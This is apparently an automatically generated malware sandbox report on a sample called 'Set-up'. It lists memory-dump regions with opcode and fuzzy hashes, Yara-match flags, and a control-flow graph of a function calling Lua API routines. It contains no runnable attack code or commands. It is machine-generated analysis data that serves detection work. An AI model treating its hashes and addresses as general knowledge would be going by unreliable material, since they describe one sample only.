                                                                                          • Instruction Fuzzy Hash: 1952C1715083458FCB15CF29C0806AABBE5FF89318F19CA6DE8D957382D774E84ADB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 285106c434c0234a52e7ab74c4b50f650ae19940123bbbc214f401134c44a373
                                                                                          • Instruction ID: a3c1bc4f2bc021c83450ba514dd26a4caabc73f5ff5c630a44ce527b464946e1
                                                                                          • Opcode Fuzzy Hash: 285106c434c0234a52e7ab74c4b50f650ae19940123bbbc214f401134c44a373
                                                                                          • Instruction Fuzzy Hash: BC4214B4915B118FE368DF29C68062ABBF1BF85710B548E2ED6A787B90D336F445DB00
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 84b3b5f65678c4b70c89cd28e1bd17fd5335923c8cf45ef558c3cafd882f8ac5
                                                                                          • Instruction ID: ae630ebce893207bee9b13240118fab9a7a6a28400f400df25704c66d45c19ae
                                                                                          • Opcode Fuzzy Hash: 84b3b5f65678c4b70c89cd28e1bd17fd5335923c8cf45ef558c3cafd882f8ac5
                                                                                          • Instruction Fuzzy Hash: BEF12577D503394BDB59CEB9CC583AD6A52A7C0204F82D62CD95BEF289DF3409874AC1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: ?tolower@?$ctype@_W@std@@
                                                                                          • String ID:
                                                                                          • API String ID: 2446306397-0
                                                                                          • Opcode ID: 36f796e1476523aa902112f600c2c489f9a3d783ef896d93af838ae0e932d625
                                                                                          • Instruction ID: c4efa32d4d8cbc1ff1062653ed3032ff42a7cebeaf84f6d68fe762fd792ed6e0
                                                                                          • Opcode Fuzzy Hash: 36f796e1476523aa902112f600c2c489f9a3d783ef896d93af838ae0e932d625
                                                                                          • Instruction Fuzzy Hash: DE226E786093448FCB54DF69C180A9ABBF1FF88314F20895EE898CB351E731D946CB96
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3fc175e3bd2761da0111f5446c7bb02b96dca47e961e065b2c660b8853c39d74
                                                                                          • Instruction ID: 468869ee2a0f27ed0617a618c9a580fa99ae8ee6f29d30782888891a85a2cc1c
                                                                                          • Opcode Fuzzy Hash: 3fc175e3bd2761da0111f5446c7bb02b96dca47e961e065b2c660b8853c39d74
                                                                                          • Instruction Fuzzy Hash: 6FD1C030F1862ADFDF268F29D8886BCB7B5EB08308F1181E9D54AA7245D7319E95CF40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 104ea06e439cf64efc7312fa3c449a3db2eab3576fea67794910c2127a13f837
                                                                                          • Instruction ID: 6c04b3a1067bfb14eeb34869b08e3d540520297cb61efbb56c9dc86818fe2066
                                                                                          • Opcode Fuzzy Hash: 104ea06e439cf64efc7312fa3c449a3db2eab3576fea67794910c2127a13f837
                                                                                          • Instruction Fuzzy Hash: 0EC16CB2A587418FC360CF28CC96BABB7E1FF85318F08892DD1D9C6242E778A155CB45
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a8660088937000bb7719c1285ceaf5f27317a447c447eb7fd0538a94b1dc15ea
                                                                                          • Instruction ID: 09f928c0d890981489e35e1e66566ce91356702af18583b6e4662a174419970a
                                                                                          • Opcode Fuzzy Hash: a8660088937000bb7719c1285ceaf5f27317a447c447eb7fd0538a94b1dc15ea
                                                                                          • Instruction Fuzzy Hash: 9E91BE35A083219BD724DF18C8D0A2AB3E2FBC9760F58856CEA859B391DB71DC41CB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bd7c89ef0e3afd4c2c30dd94db1d332a7aec04f83ff6cba012340266aaf75c52
                                                                                          • Instruction ID: 47a9988591f58c6765fe4134f1abbb1269435877507fd730ab54d24529c59939
                                                                                          • Opcode Fuzzy Hash: bd7c89ef0e3afd4c2c30dd94db1d332a7aec04f83ff6cba012340266aaf75c52
                                                                                          • Instruction Fuzzy Hash: 7571E135A083019BD725AF18C891B3BB3E2FFC5760F59893CE9958B290EF749851CB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7a7bf8900124d63f92f41133b522e9b76880ef3aea84c39e0fa240153e252505
                                                                                          • Instruction ID: 60f7ff04dd822b8af94639ce1204b3bcf18a305b3384f82c75382b17f0a78d1a
                                                                                          • Opcode Fuzzy Hash: 7a7bf8900124d63f92f41133b522e9b76880ef3aea84c39e0fa240153e252505
                                                                                          • Instruction Fuzzy Hash: 2551B2B16002049BD7A09FA4CC92FB6B3B9FF85754F048958EA85CB290E375E945C762
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8253b23cd12a5ef13358dfd62af701f5145136d3d14f8673dc5d36afc655775f
                                                                                          • Instruction ID: ef7c3425ff43feb8c6fcf8af2bb290e12fe499dc68d5cf0b358912ba8e8fd40b
                                                                                          • Opcode Fuzzy Hash: 8253b23cd12a5ef13358dfd62af701f5145136d3d14f8673dc5d36afc655775f
                                                                                          • Instruction Fuzzy Hash: EA519DB1900226C7CF269F14C8A26BAB3B6FFA5364B18926CD8D75B390F335A551C790
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 43417d1739509e3f7d8cd9af9bd2a62e8d22d5141dee40243128b75579a48c21
                                                                                          • Instruction ID: b892b197da1a4ed515e4c4bee3579686f2d4ab4097d308d6e5176d7813830fc5
                                                                                          • Opcode Fuzzy Hash: 43417d1739509e3f7d8cd9af9bd2a62e8d22d5141dee40243128b75579a48c21
                                                                                          • Instruction Fuzzy Hash: 88613D3765AAD047D7114A3C6C813A56B2B1BD7738B3E837AD9B58B3D1CE268822C351
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e7f0886e71c51a037be77bbe803af3701101e01c18405af914baea81eaf70866
                                                                                          • Instruction ID: 98544092f85f22ddb15bdbf370d749a734bce61d16f966b430c02498c74bb39a
                                                                                          • Opcode Fuzzy Hash: e7f0886e71c51a037be77bbe803af3701101e01c18405af914baea81eaf70866
                                                                                          • Instruction Fuzzy Hash: 1191EA75604B408FD315CF38C8917A6BFE2AB9A314F19896DC4EB8B392D635A506CB11
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 552aecfc181025174ff38e1338e57ec49b79f08003450b058250820eca16754d
                                                                                          • Instruction ID: 77a73201b24cbb7d04cb49da89bf8a0c7809a3c78500ef371721f821fc6f110a
                                                                                          • Opcode Fuzzy Hash: 552aecfc181025174ff38e1338e57ec49b79f08003450b058250820eca16754d
                                                                                          • Instruction Fuzzy Hash: 5A61EF745093428FD708CF28C49436ABBF1FB98714F148A6DE89A8F385DB35D945CB92
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 150e78fe37468f1252c67e5cd24b3559dadebb0c40b7c9f11b3d02a6768238c0
                                                                                          • Instruction ID: 05f6b07bd7a3a21c7a25a1957ddd5e28a2cf0b26bacd5b71fdb35536ccf3b539
                                                                                          • Opcode Fuzzy Hash: 150e78fe37468f1252c67e5cd24b3559dadebb0c40b7c9f11b3d02a6768238c0
                                                                                          • Instruction Fuzzy Hash: 7351B275A043019FC714DF94C88096AF7A6FFC9324F158A6CE8959B391D731EC82DB92
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f2f29e45a297f0d020c3e925ca4051dcc3850d2f384a99105424c8874c3d9e26
                                                                                          • Instruction ID: 0bcabb2fe7ebeb815cee01a6df849e8dba879aae1287046dfb95e98fed1dd530
                                                                                          • Opcode Fuzzy Hash: f2f29e45a297f0d020c3e925ca4051dcc3850d2f384a99105424c8874c3d9e26
                                                                                          • Instruction Fuzzy Hash: 1E41F875A043405FD730AF54EDC4A2BB3A2EB85714F29853CE585EB6A1DF31E8018B55
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3985f87cdbcca459d7b53ba8e54c4c01782424436940214457e275a8467f61f2
                                                                                          • Instruction ID: 1faf6c10a8756af846dfad2c7d0c087c0816ccb1cb031794158ebfe4463eb6e0
                                                                                          • Opcode Fuzzy Hash: 3985f87cdbcca459d7b53ba8e54c4c01782424436940214457e275a8467f61f2
                                                                                          • Instruction Fuzzy Hash: 2F5190356007048FDF24EF28D181ABAB7F1EF14710F20899ED99A8B662D735ED45CBA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0e106eb1173ea1862e037f97892a3d6c5de370f350888938d0229b7b3629f412
                                                                                          • Instruction ID: d601b7188a7c090f2bfeb35110d4c6ee184fcecb9b2d3b6904bfab50cf3cc74b
                                                                                          • Opcode Fuzzy Hash: 0e106eb1173ea1862e037f97892a3d6c5de370f350888938d0229b7b3629f412
                                                                                          • Instruction Fuzzy Hash: 51412476B187610BD31DCE3A889112ABAD2AFC6210F09C73DF4AAC73D5E674C905D741
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: be89e496ce0d45aa208c790241944c0a0b2bd13e997cba88e3147ea46693ce73
                                                                                          • Instruction ID: 0ca42be956c4bf566401938459b478061ddf445db4b0763bb91076bdabe34354
                                                                                          • Opcode Fuzzy Hash: be89e496ce0d45aa208c790241944c0a0b2bd13e997cba88e3147ea46693ce73
                                                                                          • Instruction Fuzzy Hash: 42316975B442006BE720AB18ECC1B3B739BDBD5378F046639E98457291EF35D8048662
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
                                                                                          • Instruction ID: f8dc16882a36d5ef151db8beb8e76569fce748de4719319e1a1c63e878063779
                                                                                          • Opcode Fuzzy Hash: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
                                                                                          • Instruction Fuzzy Hash: 73518275E01209DFCB08CF88C590AAEB7B2FF88314F248599D915AB355D731AE81DFA4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d06b0d024c258c0f5add527aa7b090c97b87dd4a9832558a943dc8bdac0cf8b2
                                                                                          • Instruction ID: 8474604dde2f473fae7cc640da9f9577e42af469c0dac2c8d8330c920ae20d40
                                                                                          • Opcode Fuzzy Hash: d06b0d024c258c0f5add527aa7b090c97b87dd4a9832558a943dc8bdac0cf8b2
                                                                                          • Instruction Fuzzy Hash: 7821F432E491D44FD3568B3C88506A5BBA2AF53334F2D83DAE5F16B2E2C3269D46C750
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 126da4c13eb488892ce17d924d4fedce43a5e08ecef94a60ce9836a9ebd91156
                                                                                          • Instruction ID: d5e67f09f39a0fdb3129627b929c234fd1e4274621428678c0dc9dfa754619a1
                                                                                          • Opcode Fuzzy Hash: 126da4c13eb488892ce17d924d4fedce43a5e08ecef94a60ce9836a9ebd91156
                                                                                          • Instruction Fuzzy Hash: E441CD35205B858FC325CF2AC090A52FBE2BB69214B54CA5DD89A87F52C734F81ACF90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8e897fd82ec72377907dd00d318980a70d53f6494a585f5e700c8fee083c478c
                                                                                          • Instruction ID: 5cd002a49a7befb20608fee26be6598d1517137dff89d645817266409a14d61b
                                                                                          • Opcode Fuzzy Hash: 8e897fd82ec72377907dd00d318980a70d53f6494a585f5e700c8fee083c478c
                                                                                          • Instruction Fuzzy Hash: A331D27184835A9ECB26CF00C8C07EEF7E8AF96304F54582DD88653251FBB4E649CB96
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 673162ba6d375d50d9dc9659cfa29583d419bf2c06ac203f0a5ce742a8ca816e
                                                                                          • Instruction ID: ec8d2705d896dcfa5eb5e3b7c03b9d6dfe8339d40964ed1a50d2266b2c813bd4
                                                                                          • Opcode Fuzzy Hash: 673162ba6d375d50d9dc9659cfa29583d419bf2c06ac203f0a5ce742a8ca816e
                                                                                          • Instruction Fuzzy Hash: 3D11E33BB24B3507E760CEB6DCC451B6356FBC621570A4538EA49D7643CA32F402E190
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
                                                                                          • Instruction ID: 96fca8eb34ca682e8d47e8378cb432fe76648deb5046b39c0cf948459ebfea3e
                                                                                          • Opcode Fuzzy Hash: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
                                                                                          • Instruction Fuzzy Hash: 40319374E0010ADFCB08CF98C590AAEBBB1FF88314F248599D815AB345D335AA82DF94
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 416b71b7ce5d3ad7a447599a47459b95baeddeb9c448290b0741d51279b2ee17
                                                                                          • Instruction ID: eeb3229e604dd74b4d6c97d2e87c9ec3b8ed01a24d7795671590bf44df20d011
                                                                                          • Opcode Fuzzy Hash: 416b71b7ce5d3ad7a447599a47459b95baeddeb9c448290b0741d51279b2ee17
                                                                                          • Instruction Fuzzy Hash: D90184F260030187DBA09F5498C0B2BF2EDAFD4744F18843CDA5857A80EBB5EC19DBA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 931e92df6a04de479f3c1813266d974a05571062c0c4ca0078d8e6d435bd14da
                                                                                          • Instruction ID: 17c182bd754bf9b993558696105ff54265efbb42abb7601677ce9ed65824dd71
                                                                                          • Opcode Fuzzy Hash: 931e92df6a04de479f3c1813266d974a05571062c0c4ca0078d8e6d435bd14da
                                                                                          • Instruction Fuzzy Hash: C0F0A7B1A0411457DF2789589CC0B37BB9C9F8A224F151415E8CB57142E161A84DC7E6

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 659 bec430-bec45d call bf78a0 662 bec45f-bec461 call be5d20 659->662 663 bec466-bec494 call bf78a0 call bf7440 659->663 662->663 669 bec49d-bec4b8 663->669 670 bec496-bec498 call be5d20 663->670 672 bec4ba-bec4bc call be5d20 669->672 673 bec4c1-bec507 call bd7fd0 call bd9010 lua_setmetatable lua_rawsetp 669->673 670->669 672->673 679 bec50d-bec51c 673->679 680 bec773-bec779 luaL_error 673->680 681 bec77e-bec7a6 luaL_error 679->681 682 bec522-bec554 call bf78a0 call bf7440 679->682 680->681 684 bec7ac 681->684 685 bec888-bec88d 681->685 711 bec55d-bec59b luaL_setfuncs call bf78a0 call bf7440 682->711 712 bec556-bec558 call be5d20 682->712 684->685 687 bec81c-bec829 684->687 688 bec87c-bec887 684->688 689 bec7f8-bec80d call bfbbf0 684->689 690 bec838-bec84d call bfbce0 684->690 691 bec7b3-bec7c0 684->691 692 bec80e-bec81b 684->692 693 bec84e-bec86c call bfbce0 684->693 694 bec7cf-bec7e1 call bff360 684->694 695 bec86d-bec87b 684->695 696 bec82a-bec837 684->696 697 bec7e2-bec7f7 call bfbc70 684->697 698 bec7c1-bec7ce 684->698 718 bec59d-bec59f call be5d20 711->718 719 bec5a4-bec5ab 711->719 712->711 718->719 721 bec5b0-bec5ff call bd7fd0 lua_pushcclosure lua_rawseti 719->721 724 bec601-bec628 call bd7fd0 call bd9010 721->724 729 bec62d call beb290 724->729 730 bec632-bec641 729->730 731 bec643 call beb290 730->731 732 bec648-bec670 call bf3400 731->732 735 bec679-bec772 call bd7fd0 call bd9010 luaL_getsubtable call bd7fd0 call bd9010 luaL_getsubtable call bd7fd0 call bd9010 call bd7fd0 call bf7ae0 call bd7fd0 luaL_setfuncs 732->735 736 bec672-bec674 call be5d20 732->736 736->735
                                                                                          APIs
                                                                                          • lua_setmetatable.SET-UP(?,000000FE), ref: 00BEC4E1
                                                                                          • lua_rawsetp.SET-UP(?,FFF0B9D8,00C386AC,?,000000FE), ref: 00BEC4F1
                                                                                          • luaL_setfuncs.SET-UP(?,00C38790,00000000), ref: 00BEC565
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: L_setfuncslua_rawsetplua_setmetatable
